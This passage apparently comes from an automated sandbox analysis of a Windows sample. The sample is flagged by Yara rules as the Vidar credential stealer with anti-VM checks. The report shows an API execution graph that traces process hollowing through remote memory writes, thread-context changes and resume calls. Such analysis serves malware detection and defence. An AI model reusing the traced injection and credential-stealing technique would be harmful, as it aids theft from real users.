                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:12.9%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:7%
                                                                                                                                                                              Total number of Nodes:1043
                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                              execution_graph 12723 6d5babd0 12733 6d5babf0 std::bad_exception::bad_exception 12723->12733 12724 6d5c15c6 ReadProcessMemory 12724->12733 12725 6d5bfea2 GetConsoleWindow ShowWindow 12752 6d5b80e0 12725->12752 12727 6d5b80e0 25 API calls 12727->12733 12729 6d5c1f38 GetThreadContext 12729->12733 12730 6d5c1fb3 WriteProcessMemory 12730->12733 12731 6d5c031c CreateProcessW 12731->12733 12732 6d5c20d6 WriteProcessMemory 12732->12733 12733->12724 12733->12725 12733->12727 12733->12729 12733->12730 12733->12731 12733->12732 12735 6d5c1938 Wow64SetThreadContext ResumeThread 12733->12735 12736 6d5c1e63 VirtualAlloc 12733->12736 12738 6d5c19b1 CloseHandle CloseHandle 12733->12738 12739 6d5c07ce WriteProcessMemory 12733->12739 12740 6d5c1877 WriteProcessMemory 12733->12740 12741 6d5c0be9 WriteProcessMemory 12733->12741 12742 6d5c1a99 12733->12742 12745 6d5c04e0 Wow64GetThreadContext 12733->12745 12746 6d5c1f63 VirtualAllocEx 12733->12746 12747 6d5c05b3 VirtualAllocEx 12733->12747 12748 6d5c06c7 VirtualAllocEx 12733->12748 12749 6d5c00f5 VirtualAlloc 12733->12749 12750 6d5c2246 WriteProcessMemory 12733->12750 12751 6d5c166a WriteProcessMemory 12733->12751 12777 6d5ba4e0 GetModuleHandleW 12733->12777 12783 6d5b8030 12733->12783 12735->12733 12737 6d5c1ec8 std::bad_exception::bad_exception 12736->12737 12737->12733 12738->12733 12739->12733 12740->12733 12741->12733 12743 6d5cd100 CatchGuardHandler 5 API calls 12742->12743 12744 6d5c1aa3 12743->12744 12745->12733 12746->12733 12747->12733 12748->12733 12749->12733 12750->12733 12751->12733 12766 6d5b8148 __InternalCxxFrameHandler 12752->12766 12753 6d5b989c CloseHandle CloseHandle 12753->12766 12754 6d5b8d19 CreateFileMappingA 12754->12766 12755 6d5b8ab8 GetModuleFileNameA 12755->12766 12756 6d5b96ee GetCurrentProcess 12757 6d5cdea0 std::bad_exception::bad_exception 12756->12757 12758 6d5b972f GetModuleHandleA 12757->12758 12758->12766 12759 6d5b8f1a MapViewOfFile 12759->12766 12760 6d5b94ef CloseHandle 12760->12766 12761 6d5b9360 VirtualProtect 12761->12766 12762 6d5b96cd 12763 6d5cd100 CatchGuardHandler 5 API calls 12762->12763 12764 6d5b96d7 12763->12764 12764->12733 12765 6d5b9566 CloseHandle CloseHandle 12765->12766 12766->12753 12766->12754 12766->12755 12766->12756 12766->12759 12766->12760 12766->12761 12766->12762 12766->12765 12767 6d5b97dd CloseHandle 12766->12767 12768 6d5b8a78 K32GetModuleInformation 12766->12768 12769 6d5b97fb MapViewOfFile 12766->12769 12770 6d5b9299 VirtualProtect 12766->12770 12771 6d5b8b4e CreateFileA 12766->12771 12772 6d5b88b6 GetCurrentProcess 12766->12772 12775 6d5b9774 CreateFileA 12766->12775 12776 6d5b8e17 CloseHandle 12766->12776 12767->12766 12768->12766 12769->12766 12770->12766 12771->12766 12787 6d5cdea0 12772->12787 12775->12766 12776->12766 12778 6d5ba51b std::bad_exception::bad_exception 12777->12778 12779 6d5ba6b9 NtQueryInformationProcess 12778->12779 12780 6d5ba9ab 12778->12780 12779->12778 12781 6d5cd100 CatchGuardHandler 5 API calls 12780->12781 12782 6d5ba9bb 12781->12782 12782->12733 12785 6d5b8052 12783->12785 12784 6d5cd100 CatchGuardHandler 5 API calls 12786 6d5b80cd 12784->12786 12785->12784 12786->12733 12788 6d5b8909 GetModuleHandleA 12787->12788 12788->12766 12264 6d5cd174 12265 6d5cd17f 12264->12265 12266 6d5cd1b2 12264->12266 12268 6d5cd1a4 12265->12268 12269 6d5cd184 12265->12269 12303 6d5cd2ce 12266->12303 12276 6d5cd1c7 12268->12276 12271 6d5cd189 12269->12271 12272 6d5cd19a 12269->12272 12275 6d5cd18e 12271->12275 12290 6d5cd7f2 12271->12290 12295 6d5cd7d3 12272->12295 12277 6d5cd1d3 ___scrt_is_nonwritable_in_current_image 12276->12277 12330 6d5cd863 12277->12330 12279 6d5cd1da __DllMainCRTStartup@12 12280 6d5cd2c6 12279->12280 12281 6d5cd201 12279->12281 12287 6d5cd23d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 12279->12287 12349 6d5cda02 IsProcessorFeaturePresent 12280->12349 12341 6d5cd7c5 12281->12341 12284 6d5cd2cd 12285 6d5cd210 __RTC_Initialize 12285->12287 12344 6d5cd6e3 InitializeSListHead 12285->12344 12287->12275 12288 6d5cd21e 12288->12287 12345 6d5cd79a 12288->12345 12441 6d5d2a0b 12290->12441 12533 6d5cfefc 12295->12533 12298 6d5cd7dc 12298->12275 12301 6d5cd7ef 12301->12275 12302 6d5cff07 21 API calls 12302->12298 12304 6d5cd2da ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12303->12304 12305 6d5cd30b 12304->12305 12306 6d5cd376 12304->12306 12321 6d5cd2e3 12304->12321 12553 6d5cd833 12305->12553 12307 6d5cda02 __DllMainCRTStartup@12 4 API calls 12306->12307 12311 6d5cd37d ___scrt_is_nonwritable_in_current_image 12307->12311 12309 6d5cd310 12562 6d5cd6ef 12309->12562 12312 6d5cd3b3 dllmain_raw 12311->12312 12314 6d5cd3ae 12311->12314 12327 6d5cd399 12311->12327 12315 6d5cd3cd dllmain_crt_dispatch 12312->12315 12312->12327 12313 6d5cd315 __RTC_Initialize __DllMainCRTStartup@12 12565 6d5cd9d4 12313->12565 12574 6d5c22c0 12314->12574 12315->12314 12315->12327 12321->12275 12322 6d5cd41f 12323 6d5cd428 dllmain_crt_dispatch 12322->12323 12322->12327 12325 6d5cd43b dllmain_raw 12323->12325 12323->12327 12324 6d5c22c0 __DllMainCRTStartup@12 5 API calls 12326 6d5cd406 12324->12326 12325->12327 12328 6d5cd2ce __DllMainCRTStartup@12 81 API calls 12326->12328 12327->12275 12329 6d5cd414 dllmain_raw 12328->12329 12329->12322 12331 6d5cd86c 12330->12331 12353 6d5cdbc8 IsProcessorFeaturePresent 12331->12353 12335 6d5cd87d 12336 6d5cd881 12335->12336 12363 6d5d29ee 12335->12363 12336->12279 12339 6d5cd898 12339->12279 12435 6d5cd89c 12341->12435 12343 6d5cd7cc 12343->12285 12344->12288 12346 6d5cd79f ___scrt_release_startup_lock 12345->12346 12347 6d5cdbc8 IsProcessorFeaturePresent 12346->12347 12348 6d5cd7a8 12346->12348 12347->12348 12348->12287 12350 6d5cda18 __CreateFrameInfo std::bad_exception::bad_exception 12349->12350 12351 6d5cdac3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12350->12351 12352 6d5cdb07 __CreateFrameInfo 12351->12352 12352->12284 12354 6d5cd878 12353->12354 12355 6d5cfedd 12354->12355 12372 6d5d03ac 12355->12372 12358 6d5cfee6 12358->12335 12360 6d5cfeee 12361 6d5cfef9 12360->12361 12386 6d5d03e8 12360->12386 12361->12335 12426 6d5d521d 12363->12426 12366 6d5cff0f 12367 6d5cff18 12366->12367 12368 6d5cff22 12366->12368 12369 6d5d0391 ___vcrt_uninitialize_ptd 6 API calls 12367->12369 12368->12336 12370 6d5cff1d 12369->12370 12371 6d5d03e8 ___vcrt_uninitialize_locks DeleteCriticalSection 12370->12371 12371->12368 12373 6d5d03b5 12372->12373 12375 6d5d03de 12373->12375 12377 6d5cfee2 12373->12377 12390 6d5d09dc 12373->12390 12376 6d5d03e8 ___vcrt_uninitialize_locks DeleteCriticalSection 12375->12376 12376->12377 12377->12358 12378 6d5d035e 12377->12378 12407 6d5d08ed 12378->12407 12381 6d5d0373 12381->12360 12384 6d5d038e 12384->12360 12387 6d5d0412 12386->12387 12388 6d5d03f3 12386->12388 12387->12358 12389 6d5d03fd DeleteCriticalSection 12388->12389 12389->12387 12389->12389 12395 6d5d0802 12390->12395 12393 6d5d0a14 InitializeCriticalSectionAndSpinCount 12394 6d5d09ff 12393->12394 12394->12373 12396 6d5d0823 12395->12396 12397 6d5d081f 12395->12397 12396->12397 12398 6d5d088b GetProcAddress 12396->12398 12400 6d5d087c 12396->12400 12402 6d5d08a2 LoadLibraryExW 12396->12402 12397->12393 12397->12394 12398->12397 12400->12398 12401 6d5d0884 FreeLibrary 12400->12401 12401->12398 12403 6d5d08b9 GetLastError 12402->12403 12404 6d5d08e9 12402->12404 12403->12404 12405 6d5d08c4 ___vcrt_InitializeCriticalSectionEx 12403->12405 12404->12396 12405->12404 12406 6d5d08da LoadLibraryExW 12405->12406 12406->12396 12408 6d5d0802 ___vcrt_InitializeCriticalSectionEx 5 API calls 12407->12408 12409 6d5d0907 12408->12409 12410 6d5d0920 TlsAlloc 12409->12410 12411 6d5d0368 12409->12411 12411->12381 12412 6d5d099e 12411->12412 12413 6d5d0802 ___vcrt_InitializeCriticalSectionEx 5 API calls 12412->12413 12414 6d5d09b8 12413->12414 12415 6d5d09d3 TlsSetValue 12414->12415 12416 6d5d0381 12414->12416 12415->12416 12416->12384 12417 6d5d0391 12416->12417 12418 6d5d03a1 12417->12418 12419 6d5d039b 12417->12419 12418->12381 12421 6d5d0928 12419->12421 12422 6d5d0802 ___vcrt_InitializeCriticalSectionEx 5 API calls 12421->12422 12423 6d5d0942 12422->12423 12424 6d5d095a TlsFree 12423->12424 12425 6d5d094e 12423->12425 12424->12425 12425->12418 12427 6d5d522d 12426->12427 12428 6d5cd88a 12426->12428 12427->12428 12430 6d5d50e1 12427->12430 12428->12339 12428->12366 12431 6d5d50e8 12430->12431 12432 6d5d512b GetStdHandle 12431->12432 12433 6d5d518d 12431->12433 12434 6d5d513e GetFileType 12431->12434 12432->12431 12433->12427 12434->12431 12436 6d5cd8ac 12435->12436 12437 6d5cd8a8 12435->12437 12438 6d5cda02 __DllMainCRTStartup@12 4 API calls 12436->12438 12440 6d5cd8b9 ___scrt_release_startup_lock 12436->12440 12437->12343 12439 6d5cd922 12438->12439 12440->12343 12447 6d5d2f8b 12441->12447 12444 6d5cff07 12513 6d5d0293 12444->12513 12448 6d5d2f95 12447->12448 12450 6d5cd7f7 12447->12450 12449 6d5d4e6c _unexpected 6 API calls 12448->12449 12451 6d5d2f9c 12449->12451 12450->12444 12451->12450 12452 6d5d4eab _unexpected 6 API calls 12451->12452 12453 6d5d2faf 12452->12453 12455 6d5d2e52 12453->12455 12456 6d5d2e5d 12455->12456 12457 6d5d2e6d 12455->12457 12461 6d5d2e73 12456->12461 12457->12450 12460 6d5d3430 __freea 14 API calls 12460->12457 12462 6d5d2e88 12461->12462 12463 6d5d2e8e 12461->12463 12464 6d5d3430 __freea 14 API calls 12462->12464 12465 6d5d3430 __freea 14 API calls 12463->12465 12464->12463 12466 6d5d2e9a 12465->12466 12467 6d5d3430 __freea 14 API calls 12466->12467 12468 6d5d2ea5 12467->12468 12469 6d5d3430 __freea 14 API calls 12468->12469 12470 6d5d2eb0 12469->12470 12471 6d5d3430 __freea 14 API calls 12470->12471 12472 6d5d2ebb 12471->12472 12473 6d5d3430 __freea 14 API calls 12472->12473 12474 6d5d2ec6 12473->12474 12475 6d5d3430 __freea 14 API calls 12474->12475 12476 6d5d2ed1 12475->12476 12477 6d5d3430 __freea 14 API calls 12476->12477 12478 6d5d2edc 12477->12478 12479 6d5d3430 __freea 14 API calls 12478->12479 12480 6d5d2ee7 12479->12480 12481 6d5d3430 __freea 14 API calls 12480->12481 12482 6d5d2ef5 12481->12482 12487 6d5d2c9f 12482->12487 12488 6d5d2cab ___scrt_is_nonwritable_in_current_image 12487->12488 12503 6d5d3383 EnterCriticalSection 12488->12503 12490 6d5d2cdf 12504 6d5d2cfe 12490->12504 12492 6d5d2cb5 12492->12490 12494 6d5d3430 __freea 14 API calls 12492->12494 12494->12490 12495 6d5d2d0a 12496 6d5d2d16 ___scrt_is_nonwritable_in_current_image 12495->12496 12508 6d5d3383 EnterCriticalSection 12496->12508 12498 6d5d2d20 12499 6d5d2f40 _unexpected 14 API calls 12498->12499 12500 6d5d2d33 12499->12500 12509 6d5d2d53 12500->12509 12503->12492 12507 6d5d33cb LeaveCriticalSection 12504->12507 12506 6d5d2cec 12506->12495 12507->12506 12508->12498 12512 6d5d33cb LeaveCriticalSection 12509->12512 12511 6d5d2d41 12511->12460 12512->12511 12514 6d5d029d 12513->12514 12520 6d5cd7fc 12513->12520 12521 6d5d0963 12514->12521 12517 6d5d099e ___vcrt_FlsSetValue 6 API calls 12518 6d5d02b3 12517->12518 12526 6d5d0277 12518->12526 12520->12275 12522 6d5d0802 ___vcrt_InitializeCriticalSectionEx 5 API calls 12521->12522 12523 6d5d097d 12522->12523 12524 6d5d0995 TlsGetValue 12523->12524 12525 6d5d02a4 12523->12525 12524->12525 12525->12517 12527 6d5d028e 12526->12527 12528 6d5d0281 12526->12528 12527->12520 12528->12527 12530 6d5d1d43 12528->12530 12531 6d5d3430 __freea 14 API calls 12530->12531 12532 6d5d1d5b 12531->12532 12532->12527 12539 6d5d02cc 12533->12539 12535 6d5cd7d8 12535->12298 12536 6d5d2a00 12535->12536 12537 6d5d3108 __dosmaperr 14 API calls 12536->12537 12538 6d5cd7e4 12537->12538 12538->12301 12538->12302 12540 6d5d02d8 GetLastError 12539->12540 12541 6d5d02d5 12539->12541 12542 6d5d0963 ___vcrt_FlsGetValue 6 API calls 12540->12542 12541->12535 12544 6d5d02ed 12542->12544 12543 6d5d0352 SetLastError 12543->12535 12544->12543 12545 6d5d099e ___vcrt_FlsSetValue 6 API calls 12544->12545 12552 6d5d030c 12544->12552 12546 6d5d0306 __CreateFrameInfo 12545->12546 12547 6d5d032e 12546->12547 12548 6d5d099e ___vcrt_FlsSetValue 6 API calls 12546->12548 12546->12552 12549 6d5d099e ___vcrt_FlsSetValue 6 API calls 12547->12549 12550 6d5d0342 12547->12550 12548->12547 12549->12550 12551 6d5d1d43 ___std_exception_copy 14 API calls 12550->12551 12551->12552 12552->12543 12554 6d5cd838 ___scrt_release_startup_lock 12553->12554 12555 6d5cd83c 12554->12555 12558 6d5cd848 __DllMainCRTStartup@12 12554->12558 12556 6d5d286a __DllMainCRTStartup@12 14 API calls 12555->12556 12557 6d5cd846 12556->12557 12557->12309 12559 6d5cd855 12558->12559 12560 6d5d2053 __CreateFrameInfo 21 API calls 12558->12560 12559->12309 12561 6d5d2212 12560->12561 12561->12309 12578 6d5cfeba InterlockedFlushSList 12562->12578 12566 6d5cd9e0 12565->12566 12567 6d5cd334 12566->12567 12582 6d5d2a13 12566->12582 12571 6d5cd370 12567->12571 12569 6d5cd9ee 12570 6d5cff0f ___scrt_uninitialize_crt 7 API calls 12569->12570 12570->12567 12680 6d5cd856 12571->12680 12575 6d5c2324 12574->12575 12576 6d5cd100 CatchGuardHandler 5 API calls 12575->12576 12577 6d5c287c 12576->12577 12577->12322 12577->12324 12579 6d5cfeca 12578->12579 12581 6d5cd6f9 12578->12581 12580 6d5d1d43 ___std_exception_copy 14 API calls 12579->12580 12579->12581 12580->12579 12581->12313 12583 6d5d2a1e 12582->12583 12584 6d5d2a30 ___scrt_uninitialize_crt 12582->12584 12585 6d5d2a2c 12583->12585 12587 6d5d58c8 12583->12587 12584->12569 12585->12569 12590 6d5d5759 12587->12590 12593 6d5d56ad 12590->12593 12594 6d5d56b9 ___scrt_is_nonwritable_in_current_image 12593->12594 12601 6d5d3383 EnterCriticalSection 12594->12601 12596 6d5d572f 12610 6d5d574d 12596->12610 12599 6d5d56c3 ___scrt_uninitialize_crt 12599->12596 12602 6d5d5621 12599->12602 12601->12599 12603 6d5d562d ___scrt_is_nonwritable_in_current_image 12602->12603 12613 6d5d59e5 EnterCriticalSection 12603->12613 12605 6d5d5637 ___scrt_uninitialize_crt 12606 6d5d5670 12605->12606 12614 6d5d5863 12605->12614 12627 6d5d56a1 12606->12627 12679 6d5d33cb LeaveCriticalSection 12610->12679 12612 6d5d573b 12612->12585 12613->12605 12615 6d5d5878 ___std_exception_copy 12614->12615 12616 6d5d587f 12615->12616 12617 6d5d588a 12615->12617 12618 6d5d5759 ___scrt_uninitialize_crt 68 API calls 12616->12618 12630 6d5d57fa 12617->12630 12621 6d5d5885 12618->12621 12622 6d5d18d4 ___std_exception_copy 39 API calls 12621->12622 12624 6d5d58c2 12622->12624 12624->12606 12625 6d5d58ab 12643 6d5d7084 12625->12643 12678 6d5d59f9 LeaveCriticalSection 12627->12678 12629 6d5d568f 12629->12599 12631 6d5d583a 12630->12631 12632 6d5d5813 12630->12632 12631->12621 12636 6d5d5bfc 12631->12636 12632->12631 12633 6d5d5bfc ___scrt_uninitialize_crt 39 API calls 12632->12633 12634 6d5d582f 12633->12634 12654 6d5d78a3 12634->12654 12637 6d5d5c1d 12636->12637 12638 6d5d5c08 12636->12638 12637->12625 12639 6d5d3553 __dosmaperr 14 API calls 12638->12639 12640 6d5d5c0d 12639->12640 12641 6d5d1b98 ___std_exception_copy 39 API calls 12640->12641 12642 6d5d5c18 12641->12642 12642->12625 12644 6d5d7095 12643->12644 12645 6d5d70a2 12643->12645 12646 6d5d3553 __dosmaperr 14 API calls 12644->12646 12647 6d5d70eb 12645->12647 12649 6d5d70c9 12645->12649 12653 6d5d709a 12646->12653 12648 6d5d3553 __dosmaperr 14 API calls 12647->12648 12650 6d5d70f0 12648->12650 12665 6d5d6fe2 12649->12665 12651 6d5d1b98 ___std_exception_copy 39 API calls 12650->12651 12651->12653 12653->12621 12656 6d5d78af ___scrt_is_nonwritable_in_current_image 12654->12656 12655 6d5d78b7 12655->12631 12656->12655 12657 6d5d78f0 12656->12657 12659 6d5d7936 12656->12659 12658 6d5d1b1b ___std_exception_copy 39 API calls 12657->12658 12658->12655 12660 6d5d6ea1 ___scrt_uninitialize_crt EnterCriticalSection 12659->12660 12662 6d5d793c 12660->12662 12661 6d5d795a 12664 6d5d79ac ___scrt_uninitialize_crt LeaveCriticalSection 12661->12664 12662->12661 12663 6d5d79b4 ___scrt_uninitialize_crt 62 API calls 12662->12663 12663->12661 12664->12655 12666 6d5d6fee ___scrt_is_nonwritable_in_current_image 12665->12666 12667 6d5d6ea1 ___scrt_uninitialize_crt EnterCriticalSection 12666->12667 12668 6d5d6ffd 12667->12668 12669 6d5d6f78 ___scrt_uninitialize_crt 39 API calls 12668->12669 12677 6d5d7042 12668->12677 12671 6d5d7029 FlushFileBuffers 12669->12671 12670 6d5d3553 __dosmaperr 14 API calls 12672 6d5d7049 12670->12672 12671->12672 12673 6d5d7035 GetLastError 12671->12673 12675 6d5d7078 ___scrt_uninitialize_crt LeaveCriticalSection 12672->12675 12674 6d5d3540 __dosmaperr 14 API calls 12673->12674 12674->12677 12676 6d5d7061 12675->12676 12676->12653 12677->12670 12678->12629 12679->12612 12685 6d5d2a43 12680->12685 12683 6d5d0391 ___vcrt_uninitialize_ptd 6 API calls 12684 6d5cd375 12683->12684 12684->12321 12688 6d5d3288 12685->12688 12689 6d5cd85d 12688->12689 12690 6d5d3292 12688->12690 12689->12683 12692 6d5d4e2d 12690->12692 12693 6d5d4d0a _unexpected 5 API calls 12692->12693 12694 6d5d4e49 12693->12694 12695 6d5d4e64 TlsFree 12694->12695 12696 6d5d4e52 12694->12696 12696->12689 11467 6d5d253f 11482 6d5d458d 11467->11482 11472 6d5d255b 11510 6d5d3430 11472->11510 11473 6d5d2567 11516 6d5d2598 11473->11516 11478 6d5d3430 __freea 14 API calls 11479 6d5d258b 11478->11479 11480 6d5d3430 __freea 14 API calls 11479->11480 11481 6d5d2591 11480->11481 11483 6d5d4596 11482->11483 11487 6d5d2550 11482->11487 11538 6d5d3072 11483->11538 11488 6d5d4ae4 GetEnvironmentStringsW 11487->11488 11489 6d5d4afc 11488->11489 11490 6d5d2555 11488->11490 11491 6d5d4a41 ___scrt_uninitialize_crt WideCharToMultiByte 11489->11491 11490->11472 11490->11473 11492 6d5d4b19 11491->11492 11493 6d5d4b2e 11492->11493 11494 6d5d4b23 FreeEnvironmentStringsW 11492->11494 11495 6d5d33e2 15 API calls 11493->11495 11494->11490 11496 6d5d4b35 11495->11496 11497 6d5d4b3d 11496->11497 11498 6d5d4b4e 11496->11498 11500 6d5d3430 __freea 14 API calls 11497->11500 11499 6d5d4a41 ___scrt_uninitialize_crt WideCharToMultiByte 11498->11499 11502 6d5d4b5e 11499->11502 11501 6d5d4b42 FreeEnvironmentStringsW 11500->11501 11503 6d5d4b7f 11501->11503 11504 6d5d4b6d 11502->11504 11505 6d5d4b65 11502->11505 11503->11490 11507 6d5d3430 __freea 14 API calls 11504->11507 11506 6d5d3430 __freea 14 API calls 11505->11506 11508 6d5d4b6b FreeEnvironmentStringsW 11506->11508 11507->11508 11508->11503 11511 6d5d2561 11510->11511 11512 6d5d343b HeapFree 11510->11512 11512->11511 11513 6d5d3450 GetLastError 11512->11513 11514 6d5d345d __dosmaperr 11513->11514 11515 6d5d3553 __dosmaperr 12 API calls 11514->11515 11515->11511 11517 6d5d25ad 11516->11517 11518 6d5d3566 _unexpected 14 API calls 11517->11518 11519 6d5d25d4 11518->11519 11520 6d5d25dc 11519->11520 11521 6d5d25e6 11519->11521 11522 6d5d3430 __freea 14 API calls 11520->11522 11524 6d5d2643 11521->11524 11526 6d5d3566 _unexpected 14 API calls 11521->11526 11527 6d5d2652 11521->11527 11531 6d5d266d 11521->11531 11533 6d5d3430 __freea 14 API calls 11521->11533 12249 6d5d2a91 11521->12249 11523 6d5d256e 11522->11523 11523->11478 11525 6d5d3430 __freea 14 API calls 11524->11525 11525->11523 11526->11521 12258 6d5d267a 11527->12258 11534 6d5d1bc5 ___std_exception_copy 11 API calls 11531->11534 11532 6d5d3430 __freea 14 API calls 11535 6d5d265f 11532->11535 11533->11521 11537 6d5d2679 11534->11537 11536 6d5d3430 __freea 14 API calls 11535->11536 11536->11523 11539 6d5d307d 11538->11539 11544 6d5d3083 11538->11544 11586 6d5d4e6c 11539->11586 11543 6d5d3089 11547 6d5d308e 11543->11547 11608 6d5d2aeb 11543->11608 11544->11543 11591 6d5d4eab 11544->11591 11563 6d5d4398 11547->11563 11550 6d5d30ca 11553 6d5d4eab _unexpected 6 API calls 11550->11553 11551 6d5d30b5 11552 6d5d4eab _unexpected 6 API calls 11551->11552 11554 6d5d30c1 11552->11554 11555 6d5d30d6 11553->11555 11559 6d5d3430 __freea 14 API calls 11554->11559 11556 6d5d30e9 11555->11556 11557 6d5d30da 11555->11557 11603 6d5d2db9 11556->11603 11560 6d5d4eab _unexpected 6 API calls 11557->11560 11559->11543 11560->11554 11562 6d5d3430 __freea 14 API calls 11562->11547 12045 6d5d44ed 11563->12045 11568 6d5d43db 11568->11487 11571 6d5d43f4 11574 6d5d3430 __freea 14 API calls 11571->11574 11572 6d5d4402 12070 6d5d45e8 11572->12070 11574->11568 11576 6d5d443a 11577 6d5d3553 __dosmaperr 14 API calls 11576->11577 11578 6d5d443f 11577->11578 11581 6d5d3430 __freea 14 API calls 11578->11581 11579 6d5d4481 11580 6d5d44ca 11579->11580 12081 6d5d4011 11579->12081 11584 6d5d3430 __freea 14 API calls 11580->11584 11581->11568 11582 6d5d4455 11582->11579 11585 6d5d3430 __freea 14 API calls 11582->11585 11584->11568 11585->11579 11619 6d5d4d0a 11586->11619 11588 6d5d4e88 11589 6d5d4ea3 TlsGetValue 11588->11589 11590 6d5d4e91 11588->11590 11590->11544 11592 6d5d4d0a _unexpected 5 API calls 11591->11592 11593 6d5d4ec7 11592->11593 11594 6d5d4ee5 TlsSetValue 11593->11594 11595 6d5d309d 11593->11595 11595->11543 11596 6d5d3566 11595->11596 11601 6d5d3573 _unexpected 11596->11601 11597 6d5d35b3 11636 6d5d3553 11597->11636 11598 6d5d359e HeapAlloc 11599 6d5d30ad 11598->11599 11598->11601 11599->11550 11599->11551 11601->11597 11601->11598 11633 6d5d1cb5 11601->11633 11673 6d5d2c4d 11603->11673 11815 6d5d5388 11608->11815 11612 6d5d2b05 IsProcessorFeaturePresent 11613 6d5d2b11 11612->11613 11845 6d5d199c 11613->11845 11615 6d5d2afb 11615->11612 11618 6d5d2b24 11615->11618 11851 6d5d2216 11618->11851 11620 6d5d4d3a 11619->11620 11624 6d5d4d36 _unexpected 11619->11624 11620->11624 11625 6d5d4c3f 11620->11625 11623 6d5d4d54 GetProcAddress 11623->11624 11624->11588 11631 6d5d4c50 ___vcrt_InitializeCriticalSectionEx 11625->11631 11626 6d5d4ce6 11626->11623 11626->11624 11627 6d5d4c6e LoadLibraryExW 11628 6d5d4ced 11627->11628 11629 6d5d4c89 GetLastError 11627->11629 11628->11626 11630 6d5d4cff FreeLibrary 11628->11630 11629->11631 11630->11626 11631->11626 11631->11627 11632 6d5d4cbc LoadLibraryExW 11631->11632 11632->11628 11632->11631 11639 6d5d1ce1 11633->11639 11650 6d5d3108 GetLastError 11636->11650 11638 6d5d3558 11638->11599 11640 6d5d1ced ___scrt_is_nonwritable_in_current_image 11639->11640 11645 6d5d3383 EnterCriticalSection 11640->11645 11642 6d5d1cf8 __CreateFrameInfo 11646 6d5d1d2f 11642->11646 11645->11642 11649 6d5d33cb LeaveCriticalSection 11646->11649 11648 6d5d1cc0 11648->11601 11649->11648 11651 6d5d311e 11650->11651 11652 6d5d3124 11650->11652 11653 6d5d4e6c _unexpected 6 API calls 11651->11653 11654 6d5d4eab _unexpected 6 API calls 11652->11654 11656 6d5d3128 SetLastError 11652->11656 11653->11652 11655 6d5d3140 11654->11655 11655->11656 11658 6d5d3566 _unexpected 12 API calls 11655->11658 11656->11638 11659 6d5d3155 11658->11659 11660 6d5d315d 11659->11660 11661 6d5d316e 11659->11661 11663 6d5d4eab _unexpected 6 API calls 11660->11663 11662 6d5d4eab _unexpected 6 API calls 11661->11662 11664 6d5d317a 11662->11664 11667 6d5d316b 11663->11667 11665 6d5d317e 11664->11665 11666 6d5d3195 11664->11666 11668 6d5d4eab _unexpected 6 API calls 11665->11668 11670 6d5d2db9 _unexpected 12 API calls 11666->11670 11669 6d5d3430 __freea 12 API calls 11667->11669 11668->11667 11669->11656 11671 6d5d31a0 11670->11671 11672 6d5d3430 __freea 12 API calls 11671->11672 11672->11656 11674 6d5d2c59 ___scrt_is_nonwritable_in_current_image 11673->11674 11687 6d5d3383 EnterCriticalSection 11674->11687 11676 6d5d2c63 11688 6d5d2c93 11676->11688 11679 6d5d2d5f 11680 6d5d2d6b ___scrt_is_nonwritable_in_current_image 11679->11680 11692 6d5d3383 EnterCriticalSection 11680->11692 11682 6d5d2d75 11693 6d5d2f40 11682->11693 11684 6d5d2d8d 11697 6d5d2dad 11684->11697 11687->11676 11691 6d5d33cb LeaveCriticalSection 11688->11691 11690 6d5d2c81 11690->11679 11691->11690 11692->11682 11694 6d5d2f76 _unexpected 11693->11694 11695 6d5d2f4f _unexpected 11693->11695 11694->11684 11695->11694 11700 6d5d5ca0 11695->11700 11814 6d5d33cb LeaveCriticalSection 11697->11814 11699 6d5d2d9b 11699->11562 11701 6d5d5cb6 11700->11701 11703 6d5d5d20 11700->11703 11701->11703 11705 6d5d5ce9 11701->11705 11710 6d5d3430 __freea 14 API calls 11701->11710 11704 6d5d3430 __freea 14 API calls 11703->11704 11727 6d5d5d6e 11703->11727 11706 6d5d5d42 11704->11706 11707 6d5d5d0b 11705->11707 11715 6d5d3430 __freea 14 API calls 11705->11715 11708 6d5d3430 __freea 14 API calls 11706->11708 11709 6d5d3430 __freea 14 API calls 11707->11709 11711 6d5d5d55 11708->11711 11712 6d5d5d15 11709->11712 11714 6d5d5cde 11710->11714 11716 6d5d3430 __freea 14 API calls 11711->11716 11719 6d5d3430 __freea 14 API calls 11712->11719 11713 6d5d5ddc 11720 6d5d3430 __freea 14 API calls 11713->11720 11728 6d5d5fbd 11714->11728 11717 6d5d5d00 11715->11717 11718 6d5d5d63 11716->11718 11756 6d5d60bb 11717->11756 11724 6d5d3430 __freea 14 API calls 11718->11724 11719->11703 11725 6d5d5de2 11720->11725 11722 6d5d3430 14 API calls __freea 11726 6d5d5d7c 11722->11726 11724->11727 11725->11694 11726->11713 11726->11722 11768 6d5d5e11 11727->11768 11729 6d5d5fce 11728->11729 11755 6d5d60b7 11728->11755 11730 6d5d5fdf 11729->11730 11731 6d5d3430 __freea 14 API calls 11729->11731 11732 6d5d3430 __freea 14 API calls 11730->11732 11736 6d5d5ff1 11730->11736 11731->11730 11732->11736 11733 6d5d3430 __freea 14 API calls 11734 6d5d6003 11733->11734 11735 6d5d6015 11734->11735 11737 